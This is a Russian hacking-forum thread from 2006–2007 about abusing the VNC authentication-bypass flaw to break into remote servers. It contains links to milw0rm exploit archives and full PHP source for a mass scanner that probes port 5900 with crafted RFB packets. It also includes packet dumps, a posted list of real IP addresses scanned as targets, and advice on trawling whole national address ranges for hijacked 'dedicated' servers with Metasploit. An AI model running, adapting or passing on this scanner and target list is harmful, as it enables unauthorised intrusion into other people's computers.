Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
09.11.2006, 18:01
|
|
Новичок
Регистрация: 07.11.2006
Сообщений: 9
Провел на форуме:
48969
Репутация:
0
|
|
KSURi - Спасибо, что разложил по полочкам и резжевал! =) РЕСПЕКТ!
|
|
|
09.11.2006, 18:16
|
|
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме:
4836047
Репутация:
930
|
|
Перезалейте куда-то, не качает чего-то.
|
|
|
|
09.11.2006, 21:07
|
|
Постоянный
Регистрация: 06.06.2006
Сообщений: 515
Провел на форуме:
1985206
Репутация:
963
|
|
К сожалению копии геминого скрипта у меня нету, так что:
win: http://www.milw0rm.com/sploits/05172006-VNC_bypauth-win32.rar
nix based: http://www.milw0rm.com/sploits/05172006-VNC_bypauth-linux.tar.gz
|
|
|
|
09.02.2007, 00:03
|
|
Banned
Регистрация: 06.07.2006
Сообщений: 83
Провел на форуме:
644264
Репутация:
26
|
|
а этот скрипт ещё работает,хочу попробывать надыбать дедиков себе?
|
|
|
|
02.07.2007, 09:06
|
|
Новичок
Регистрация: 04.08.2006
Сообщений: 29
Провел на форуме:
38460
Репутация:
3
|
|
Перезалейте скрипт внс и внц авторутер с сорцами: плиз и какой порт на внц ?
|
|
|
|
12.07.2007, 00:20
|
|
Banned
Регистрация: 04.12.2005
Сообщений: 826
Провел на форуме:
5223479
Репутация:
3813
|
|
Перезалейте гемин скрипт
|
|
|
|
12.07.2007, 00:53
|
|
Administrator
Регистрация: 12.10.2006
Сообщений: 466
Провел на форуме:
17234747
Репутация:
5170
|
|
Код:
<?php
/**
Made by gemaglabin ; underwater.cup.su
Respectz : SkvoznoY,Bug(0)r,ZaCo,FUF,Cash
#aol on ru.dal.net ; cup.su and antichat.ru
try to connect vulnerable hosts with Bl4ck-VNC-Viewer
milw0rm.com/exploits/1791
*/
# configure
define ( '_HELLO_PACKET', '524642203030332E3030380A');
set_time_limit(0);
ini_set("display_errors","0");
# loging...
function tpl_process($title,$color)
{
return <<<HTML
<SCRIPT>
with(document.getElementById('logarea'))
{
str = "$title";
col = "$color"
str = '<FONT FACE=TAHOMA><FONT SIZE=2><FONT COLOR=' + col + '>' + str + '</FONT></FONT></FONT>';
innerHTML += innerHTML ? "<BR>\\n" + str : str;
scrollTop += 14;
}
</SCRIPT>
HTML;
}
# main function
function Scan_Server ($aserver,$aport )
{
global $fsock;
$fsock = fsockopen($aserver,(int) $aport,$errnum,$errstr,2 );
if ($fsock)
{
$res = false;
fread( $fsock,10 );
# sending first packet named hello
$request = pack("H*",_HELLO_PACKET);
fwrite ( $fsock,$request );
fread( $fsock,10 );
# sending second packet where we try to ayth without pass
$request = pack("H*","01");
fwrite ( $fsock,$request );
# parsing responce for our auth packet
$answer = fread( $fsock,10 );
$answer = unpack("H*",$answer);
if ($answer[1] = "00000000") $res = true;
fclose ($fsock);
}
return $res;
}
SENDING HELLO PACKET
0x0000 00 50 8B 0D 33 54 00 04-61 5B 86 D3 08 00 45 00 .P‹.3T..a[†У..E.
0x0010 00 5E C3 9B 00 00 DE 2F-09 B8 C0 A8 7C 63 0A 0A .^Г›..Ю/.ёАЁ|c..
0x0020 C8 07 30 81 88 0B 00 3A-12 D6 00 00 38 98 00 00 И.0Ѓ?..:.Ц..8˜..
0x0030 3B 18 FF 03 00 21 45 00-00 36 C3 9A 40 00 DE 06 ;.я..!E..6Гљ@.Ю.
0x0040 0C 8C 0A 07 FF FE 51 38-71 5D 09 BC 17 0C 01 B9 .Њ..яюQ8q].ј...№
0x0050 1A B2 36 C6 DA 55 50 18-FF F3 27 D7 00 00 52 46 .І6ЖЪUP.яу'Ч..RF
0x0060 42 20 30 30 33 2E 30 30-38 0A 0D 0A B 003.008...
0x0000 00 50 8B 0D 33 54 00 04-61 5B 86 D3 08 00 45 00 .P‹.3T..a[†У..E.
0x0010 00 51 DC A8 00 00 DE 2F-F0 B7 C0 A8 7C 63 0A 0A .QЬЁ..Ю/р·АЁ|c..
0x0020 C8 07 30 81 88 0B 00 2D-12 D6 00 00 3F 8E 00 00 И.0Ѓ?..-.Ц..?Ћ..
0x0030 42 1A FF 03 00 21 45 00-00 29 DC A7 40 00 DE 06 B.я..!E..)Ь§@.Ю.
0x0040 F3 8B 0A 07 FF FE 51 38-71 5D 0A 58 17 0C F3 50 у‹..яюQ8q].X..уP
0x0050 85 8C 0F 43 D7 EF 50 18-FF F1 60 CA 00 00 01 …Њ.CЧпP.яс`К...
VULNERABLE SERVER
0x0000 00 04 61 5B 86 D3 00 50-8B 0D 33 54 08 00 45 00 ..a[†У.P‹.3T..E.
0x0010 00 54 EC D9 00 00 FA 2F-C4 83 0A 0A C8 07 C0 A8 .TмЩ..ъ/Дѓ..И.АЁ
0x0020 7C 63 30 81 88 0B 00 30-40 00 00 00 42 1B 00 00 |c0Ѓ?..0@...B...
0x0030 3F 8E FF 03 00 21 45 00-00 2C 21 84 40 00 6B 06 ?Ћя..!E..,!„@.k.
0x0040 21 AD 51 38 71 5D 0A 07-FF FE 17 0C 0A 58 0F 43 !*Q8q]..яю...X.C
0x0050 D7 EF F3 50 85 8D 50 18-FF F2 61 C5 00 00 00 00 ЧпуP…ЌP.ятaЕ....
0x0060 00 00 ..
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<HEAD>
<TITLE>VNC Auth Bypass Scaner cup.[su]</TITLE>
<STYLE TYPE="TEXT/CSS">
body{
overflow: auto;
}
input, select, div {
font: 11px tahoma, verdana, arial;
}
input.text, select {
width: 100%;
}
fieldset {
margin-bottom: 4px;
}
#header {
font-size: 9px;
color: white;
padding: 4px;
background-color: #7A96DF;
font-family: tahoma;
text-vertical: center;
}
</STYLE>
</HEAD>
<BODY BGCOLOR=#ECE9D8 TEXT=#000000>
<form name="check" method="post" action="?go">
<div style="background-color: #F4F3EE; margin: auto; border: 1px solid #919B9C; width: 318px;">
<div id="header">
<a href="http://cup.su" style="color: white; text-decoration: none; font-weight: bold; background-color: #7A96DF;">
VNC Auth Bypass Scaner cup.[su]
</a>
</div>
<div style="background-color: #F4F3EE; width: 300px; font-size:11px; border: 1px solid #919B9C; margin: 4px; padding:4px;">
<td><textarea style="width: 297px; height: 300px; border: 1px solid #919B9C;WRAP:soft;" name="servers"></textarea></td><br><br>
<DIV ID=logarea STYLE="width: 97%; height: 140px; border: 1px solid #7F9DB9; padding: 3px; overflow: auto"></DIV></td>
</tr>
<tr>
<td></td>
<tr>
<td></td>
<br>
<td><input class="text" type="submit" Value="Scan servers" style="width: 299px; margin: auto;"/></td>
</tr>
</tr>
</table>
</div>
</div>
</form>
</BODY>
<?php
if (isset($_POST['servers']))
{
$_servers = $_POST['servers'];
$servers = explode("\r\n",$_servers);
for ($i=0;$i<count($servers);$i++)
{
$host = $servers[$i];
$port = "5900";
$vuln = Scan_Server($host,$port);
if (!$vuln) echo tpl_process("<b>$host is not vulnerable</b>","red");
else echo tpl_process("<b>$host is vulnerable</b>","green");
}
}
?>
|
|
|
|
02.10.2007, 02:12
|
|
Новичок
Регистрация: 29.07.2006
Сообщений: 16
Провел на форуме:
125133
Репутация:
19
|
|
Вот насканил пару но приконектитса к ним не могу иле пас просит иле исче какаето х*ин*я
212.147.28.150
213.147.108.35
213.177.73.9
213.176.142.73
213.179.6.43
213.192.200.249
213.200.229.57
213.210.5.24
213.210.5.25
213.210.5.14
213.210.5.15
213.210.5.20
213.233.112.69
213.221.55.226
|
|
|
|
11.10.2007, 20:34
|
|
Познающий
Регистрация: 08.08.2007
Сообщений: 73
Провел на форуме:
167396
Репутация:
91
|
|
Сообщение от the_end
Вот насканил пару но приконектитса к ним не могу иле пас просит иле исче какаето х*ин*я
212.147.28.150
213.147.108.35
213.177.73.9
213.176.142.73
213.179.6.43
213.192.200.249
213.200.229.57
213.210.5.24
213.210.5.25
213.210.5.14
213.210.5.15
213.210.5.20
213.233.112.69
213.221.55.226
хы дядя, елиб ты пользовался багой примерно год назад,
то наверное тебе бы удалось, чтонидь отловить. А сейчас для добычи дедика нужно перелопатить весь сегмент какой либо страны... К примеру недавно в Австралии поймал пару дедиков W2003. Попробуй приконеткится через метасплоет, у меня иногда прокатывает...
|
|
|
|
20.10.2007, 16:36
|
|
Участник форума
Регистрация: 09.08.2006
Сообщений: 157
Провел на форуме:
1583810
Репутация:
56
|
|
Ссорь за тупой вопрос но как запустить этот скрипт,с какими параметрами и что должно быть розришено на шелле?
И как там ставить диапазон?
--
заранее спс
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
